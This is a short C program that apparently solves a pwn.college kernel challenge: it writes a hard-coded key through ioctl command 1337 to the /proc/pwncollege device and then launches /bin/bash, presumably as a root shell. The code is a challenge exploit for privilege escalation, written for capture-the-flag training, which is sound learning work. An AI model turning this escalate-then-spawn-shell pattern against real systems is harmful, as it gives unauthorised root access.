10 lines
224 B
C
10 lines
224 B
C
#include <stdlib.h>
|
|
#include <sys/ioctl.h>
|
|
#include <fcntl.h>
|
|
#include <unistd.h>
|
|
|
|
int main() {
|
|
int fd = open("/proc/pwncollege", O_WRONLY);
|
|
ioctl(fd, 1337, "amykdifilzqobpdg");
|
|
execve("/bin/bash", NULL, NULL);
|
|
} |